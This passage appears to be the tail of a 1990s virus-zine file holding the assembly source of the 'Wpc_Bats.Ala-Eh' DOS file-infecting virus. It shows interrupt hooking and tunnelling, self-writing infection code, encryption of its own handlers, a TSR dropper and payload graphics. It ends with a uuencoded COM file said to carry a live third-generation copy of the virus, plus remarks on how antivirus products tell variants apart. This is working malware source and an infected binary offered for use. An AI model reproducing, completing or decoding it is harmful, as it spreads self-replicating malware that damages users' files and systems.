mov ah,1ah
mov dx,offset VirusDta
call UseDos ; set up virus dta
mov ah,2eh
xor dl,dl
xor al,al
call UseDos ; turn off verify
mov dx,offset VirusAsciiz
mov ah,4eh
mov cx,23h
call UseDos ; find file
ret
GetInfectedFileSavedHost:
mov al,2
call MovePointerZeroLoHi ; move pointer to eof
jc ErrorOnGetFileSavedHost
mov word ptr _dLoLen[VirusDta],ax
mov word ptr _dHiLen[VirusDta],dx
sub ax,(offset Timer - offset SavedHost)
sbb dx,0
mov cx,dx
mov dx,ax
xor al,al
call MovePointer ; move pointer to loc saved host
jc ErrorOnGetFileSavedHost
mov cx,46
mov dx,offset StealthBuffer
mov ah,3fh
call UseDos ; read from file
jc ErrorOnGetFileSavedHost
mov si,offset StealthBuffer
SaveHostFileData: ; save 26 bytes
mov di,offset SavedHost
mov cx,26
repe movsb
call MaskSavedHostData ; encrypt
clc
ErrorOnGetFileSavedHost:
ret
WriteVirus:
mov cx,VirLen
mov dx,offset Relocator
mov ah,40h
MaskInt21HandlerBegin:
call MaskInt21Handler ; encrypt int 21 handler
call UseDos ; write virus
jc ErrorOnWrite
cmp ax,cx ; write ok?
ErrorOnWrite:
call MaskInt21Handler ; decrypt int 21 handler
ret
MovePointerStart: ; pointer functions
xor al,al
MovePointerZeroLoHi:
xor dx,dx
MovePointerZeroHi:
xor cx,cx
MovePointer:
mov ah,42h
UseDos:
pushf
cli
db 9ah
Int21 label dword ; old int 21 handler
Int21Offset dw ?
Int21Segment dw ?
ret
DrawVerticalPixel: ; draw ala-eh vertical lines
mov bx,23h
VerticalPixelLoop:
call WritePixel
inc dx
dec bx
jnz VerticalPixelLoop
ret
DrawHorizontalPixel: ; draw ala-eh horizontal lines
mov bx,23h
HorizontalPixelLoop:
call WritePixel
inc cx
dec bx
jnz HorizontalPixelLoop
ret
WritePixel:
mov ax,0c0fh ;write graphic pixel at cx:dx
int 10h
ret
ShowAlaehGraphics:
call SaveRegisters
push cs
pop ds
mov ax,0eh ; switch to video mode 0Eh
int 10h ; 640 x 200 color graphics ega/vga
mov cx,235
mov dx,55
mov bx,4bh ; i think the labels would
DrawLeftLegA_ALF: ; would explain what is being done
call WritePixel
inc dx
dec cx
dec bx
jnz DrawLeftLegA_ALF
mov cx,323
mov dx,55
mov bx,4bh
DrawVertLineL_ALF:
call WritePixel
inc dx
dec bx
jnz DrawVertLineL_ALF
dec dx
mov bx,2dh
DrawHorizLineL_ALF:
call WritePixel
add cx,2
dec bx
jnz DrawHorizLineL_ALF
mov cx,420
mov bx,4bh
DrawVertLineF_ALF:
call WritePixel
dec dx
dec bx
jnz DrawVertLineF_ALF
mov bx,28h
DrawTopHorizLineF_ALF:
call WritePixel
add cx,2
dec bx
jnz DrawTopHorizLineF_ALF
mov di,6
mov si,offset VerticalData
DrawVerticals_AlaEh:
lodsw
mov dx,ax
lodsw
mov cx,ax
call DrawVerticalPixel
dec di
jnz DrawVerticals_AlaEh
mov cx,235
mov dx,55
mov bx,4bh
DrawRightLegA_ALF:
call WritePixel
inc dx
inc cx
dec bx
jnz DrawRightLegA_ALF
mov si,offset HorizontalData
mov di,7
DrawHorizontals_AlaEh:
lodsw
mov cx,ax
lodsw
mov dx,ax
call DrawHorizontalPixel
dec di
jnz DrawHorizontals_AlaEh
mov dx,82
mov cx,430
mov bx,0ch
DrawExclamationLoop1:
call WritePixel
add dx,2
inc cx
dec bx
jnz DrawExclamationLoop1
mov bx,0dh
DrawExclamationLoop2:
call WritePixel
sub dx,2
inc cx
dec bx
jnz DrawExclamationLoop2
mov bx,0ch
DrawExclamationLoop3:
sub cx,2
call WritePixel
dec bx
jnz DrawExclamationLoop3
mov cx,435
mov dx,109
mov bx,7
DrawExclamationLoop4:
call WritePixel
add cx,2
dec bx
jnz DrawExclamationLoop4
mov bx,3
DrawExclamationLoop5:
call WritePixel
add dx,2
dec bx
jnz DrawExclamationLoop5
mov dx,114
mov bx,7
DrawExclamationLoop6:
call WritePixel
sub cx,2
dec bx
jnz DrawExclamationLoop6
mov bx,3
DrawExclamationLoop7:
call WritePixel
sub dx,2
dec bx
jnz DrawExclamationLoop7
mov cx,160
mov dx,120
mov bx,0a0h
DrawExclamationLoop8:
call WritePixel
add cx,2
dec bx
jnz DrawExclamationLoop8
mov cx,302
mov dx,100
mov bx,0fh
DrawExclamationLoop9:
call WritePixel
inc cx
dec bx
jnz DrawExclamationLoop9
mov bx,32h
DelayLoop:
mov cx,-1 ; delay so that you would see it
loop $
dec bx
jnz DelayLoop
mov ah,0 ; restore video mode
mov al,[VideoMode] ; clears screen
int 10h
call RestoreRegisters
ret
ShowAlaehMessage: ; use direct screen write
call SaveRegisters
mov ax,0b000h
cmp byte ptr [VideoMode],7 ; use mono?
je UseMonoScreenMem
mov ax,0b800h
UseMonoScreenMem:
push cs
pop ds
mov es,ax
mov di,((((ScrHigh-MesHigh)/2)*ScrWide)+((ScrWide-MesWide)/2))*2
mov si,offset AlaehMessage
GetAnotherMessageChar:
mov ah,es:[di+1]
or ah,15
lodsb
cmp al,13 ; end of text
je DoneShowMess
or al,al ; end of line
jz ShowNextLine
cmp al,20h ; special handler for space
jne UseMessChar
mov ax,es:[di]
UseMessChar:
stosw
jmp GetAnotherMessageChar
ShowNextLine:
add di,(80-37)*2 ; this is (ScrWide-MesWide)*2 but we
jmp GetAnotherMessageChar ; would not get an exact copy of the
DoneShowMess: ; virus if we use this
call RestoreRegisters
ret
Int1cHandler:
pushf
dec word ptr cs:[Timer] ; one hour already?
jnz PassToOldInt1c
mov word ptr cs:[Timer],-16 ; reset to one hour
push ax
push es
mov ax,40h
mov es,ax
mov al,es:[MotorState]
test al,15
pop es
pop ax
jnz PassToOldInt1c
call ShowAlaehGraphics ; draw alaeh in alf
PassToOldInt1c:
popf
db 0eah
Int1cOffset dw ?
Int1cSegment dw ?
;
; if the segment address of old int 1Ch handler is not F000h, Findvirus 7.88
; would detect the virus as "This virus is like WPCB". if another program
; hooked INT 1Ch before the virus did, all replications of the virus on that
; day would be identified as unknown. the virus does not tunnel int 1Ch
; only those with F000:xxxx are identified as "WPCB.3072".
;
; What a lousy way to determine variants..... :( F-Prot is also into
; this far pointer thingy to determine variants.
;
Int16Handler:
pushf
or ah,ah ; is get key?
jz GotReadKey
popf
db 0eah
Int16 label dword
Int16Offset dw ?
Int16Segment dw ?
GotReadKey:
popf
pop cs:[Int16CallerOffset]
pop cs:[Int16CallerSegment]
call cs:[Int16]
pushf
cmp ax,3b00h ; is it f1?
jne ReturnToInt16Caller
call ShowAlaehMessage ; show message
ReturnToInt16Caller:
popf
db 0eah
Int16CallerOffset dw ?
Int16CallerSegment dw ?
CommandComFlag db ?
AlaehMessage db 32,32,5 dup (0dch),32,0dch,5 dup (32),5 dup (0dch)
db 5 dup (32),5 dup (0dch),32,0dch,32,32,32,0dch,32,32,0
db 32,0b3h,0dbh,0dch,0dch,0dch,0dbh,0b3h,0dbh,32,32,32,32
db 0b3h,0dbh,0dch,0dch,0dch,0dbh,32,0dch,0dch,32,0b3h,0dbh
db 0dch,0dch,0dch,32,0b3h,0dbh,0dch,0dch,0dch,0dbh,32,32,0
db 32,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,0b3h,0dbh,0dch,0dch,0dch
db 0dch,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,32,32,32,32,0b3h,0dbh
db 0dch,0dch,0dch,0dch,0b3h,0dbh,0c4h,0c4h,0bfh,0dbh,32,32,0
db 32,0c0h,0d9h,32,32,0c0h,0d9h,0c0h,0c4h,0c4h,0c4h,0c4h,0d9h
db 0c0h,0d9h,32,32,0c0h,0d9h,32,32,32,32,0c0h,4 dup (0c4h)
db 0d9h,0c0h,0d9h,32,32,0c0h,0d9h,32,32,0
Measure db 6 dup (0c4h),32,'A.R.Jr W P C B A T S ',7 dup (0c4h)
db 13 ;<--------- end of alaeh text delimeter
MesWide equ ($-Measure)-1
MesHigh equ ($-AlaehMessage)/(MesWide+1)
;AlaehMessage db ' ÜÜÜÜÜ Ü ÜÜÜÜÜ ÜÜÜÜÜ Ü Ü ',0
; db ' ³ÛÜÜÜÛ³Û ³ÛÜÜÜÛ ÜÜ ³ÛÜÜÜ ³ÛÜÜÜÛ ',0
; db ' ³ÛÄÄ¿Û³ÛÜÜÜܳÛÄÄ¿Û ³ÛÜÜÜܳÛÄÄ¿Û ',0
; db ' ÀÙ ÀÙÀÄÄÄÄÙÀÙ ÀÙ ÀÄÄÄÄÙÀÙ ÀÙ ',0
;Measure db 'ÄÄÄÄÄÄ A.R.Jr W P C B A T S ÄÄÄÄÄÄÄ',13
;MesWide equ (Int24-Measure)-1
;MesHigh equ ($-AlaehMessage)/(MesWide+1)
TempInt21 label dword
TempInt21Offset dw 2121h
TempInt21Segment dw 2121h
Timer dw ?
ReturnPoint dw ?
VideoMode db ?
db ?
ActiveDta label dword
DtaOffset dw ?
DtaSegment dw ?
Int24 label dword
Int24Offset dw ?
Int24Segment dw ?
VirusDta db 45 dup (?)
VirusAsciiz db 65 dup (?)
ComJumpByte equ byte ptr $
ComJumpDisp equ word ptr $+1
ReadBuffer dw 12 dup (?)
db ? ; unused
HandleTable equ $
rept 5
dw -1 ; saved handle
db AsciizLen dup (?) ; saved asciiz
endm
db 5 dup (?) ; dont know whats this for
StealthBuffer db 36 dup (?)
StackFrame db 300 dup (?)
WpcStackPt equ $
align 16
Dropper: ; to avoid any complication, ive setup
cld ; a new dropper. this dropper would
push cs ; install the virus as low mem tsr.
pop ds ; let us leave the dirty work of topmem
mov [Psp],es ; load to the virus in succeeding gens
xor ax,ax ; unless you make changes, you will get
mov es,ax ; an exact copy of the virus, except if
mov word ptr [TempInt21Offset],Ivt21 ; frisk and drsolomon gets
les bx,es:[Ivt21] ; another of their bright ideas on virus
mov [Int21Offset],bx ; detection
mov [Int21Segment],es
Drop1:
mov cx,128
Drop2:
cmp byte ptr es:[bx],0eah
jne Drop3
inc bx
mov [TempInt21Offset],bx
mov [TempInt21Segment],es
les bx,es:[bx]
mov [Int21Offset],bx
mov [Int21Segment],es
jmp Drop2
Drop3:
inc bx
cmp byte ptr es:[bx-1],2eh
loopnz Drop3
jcxz Drop5
cmp word ptr es:[bx],1effh
je Drop4
cmp word ptr es:[bx],2effh
loopnz Drop3
jcxz Drop5
Drop4:
mov di,es:[bx+2]
mov [TempInt21Offset],di
mov [TempInt21Segment],es
les bx,es:[di]
mov [Int21Offset],bx
mov [Int21Segment],es
jmp Drop1
newline db 7,13,10,'$'
align 2
Drop5:
mov si,offset Int21Handler
mov di,dx
mov cx,10
repe cmpsw
jne Drop6
mov ah,9
mov dx,offset newline
int 21h
call ShowAlaehMessage
call ShowIt
mov ah,9
mov dx,offset newline
int 21h
mov ax,4cffh
int 21h
align 2
Drop6:
mov ah,0fh
int 10h
mov [VideoMode],al
mov [Timer],-16
mov [RelocToVir],offset DecryptEntryCode
mov si,offset AlaehMessage
xor ax,ax
mov bx,ax
Drop7:
lodsb
add bl,al
adc bh,ah
cmp al,13
jne Drop7
mov [AlaehMessageCxSum],bx
mov si,offset EntryCodeMaskBegin
std
Drop8:
mov bx,offset EntryCodeMaskEnd
Drop9:
cmp bx,offset EntryCodeMaskKeyEnd
je Drop8
dec bx
lodsb
xor al,[bx]
mov [si+1],al
cmp si,offset EntryCodeMaskEnd
jne Drop9
call MaskInt21Handler
mov ax,3516h
int 21h
mov [Int16Offset],bx
mov [Int16Segment],es
mov ax,351ch
int 21h
mov [Int1cOffset],bx
mov [Int1cSegment],es
mov ax,2516h
mov dx,offset Int16Handler
int 21h
mov ax,251ch
mov dx,offset Int1cHandler
int 21h
les di,[TempInt21]
mov ax,offset Int21Handler
cli
stosw
mov ax,cs
stosw
sti
push cs
pop es
call ShowAlaehMessage
mov ax,3100h
mov dx,MemRequired+16
int 21h
WpcBatsAlaEh3072 ends
end Relocator
ÄÄ WPCA3072.ASM ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The uuencoded file below is infected by a virus created by compiling
the source code above in TASM 2.01. The virus in this file is on the
third generation. The codes of the virus in this file is guaranteed
to be an exact byte-for-byte match of the virus found in the wild.
However, AVs use uninitialized data to determine variations from the
original virus. The values of these far pointers are beyond my
control. If AVs detect this file as having a somewhat different virus
or a not exact identification, then that AV uses uninitialized dat as
determinant for variants.
ÄÄ WPCA3072.UUE STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
begin 644
wpca3072.com
MZ>T!#2`@(`T*36%B=6AA>2$-"@I4:&ES(&ES(%=P8U]"871S+D%L82U%:"XS
M,#<R('9I<G5S(&-O;6EN9R!T;R!Y;W4@9G)O;2!T:&4@4&AI;&EP<&EN97,N
M#0I"<F]U9VAT('1O('EO=2!L:79E(&)Y($A%6"U&24Q%4R!.;RX@-`T*"DA%
M6"U&24Q%4R!A;F0@4'5T;VMS82!+87=A>6%N(&%R92!N;W0@<F5S<&]N<VEB
M;&4@9F]R(&%C='5A;"P@:6UP;&EE9"!A;F0O;W(-"FEM86=I;F%R>2!D86UA
M9V4@87)I<VEN9R!D:7)E8W1L>2!O<B!I;F1I<F5C=&QY(&9R;VT@=&AE('5S
M92P@;6ES=7-E(&]R(&YO;BUU<V4-"F]F('1H:7,@<')O9W)A;2X@5&AE('!E
M<G-O;B!W:&\@97AE8W5T97,@=&AI<R!P<F]G<F%M(&)E87)S(&9U;&P@<F5S
M<&]N<VEB:6QI='D-"F9O<B!H:7,O:&5R(&%C=&EO;G,N#0H*5&AI<R!P<F]G
M<F%M(&ES('-T<FEC=&QY(&9O<B!E9'5C871I;VYA;"!O<B!R97-E87)C:"!P
M=7)P;W-E<R!O;FQY+@T*"@HD""`:#A^Z!P&T"<TAM$S-(0``````````````
M`(S(!1\`4+L+`5/+C,*,R#/_CMB^M@/]^H[0B^:[1P&!^R$!=/=+CL='B^S1
MY]'GK#('B$8`)C!%`H/O!$R!_$<!=`0+_W38O"B3%/C"0]++!ZH'!>!'`Z_"
M_>FU@GEYAT#3/U$PK`X*_;"!W3LC=[$H`K"->$<GL!J/__W&2`OX\2"$?L>+
MRE'8.Y*%<8Z6N@RJ-KL.I2L;Q9^538UR;P$4D##$"<#NAJ]-ES_I9^=DYV$A
MRI$%)J9/NBQC%^<FIWUX_FIP`MGUY]XOE!^HU.',].Y8V2WK(#3YA$.[E;
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
-(,3$Q,3$Q,0-:A`0`0``
`
end
ÄÄ WPCA3072.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-=<{[* HF4 *]}>=-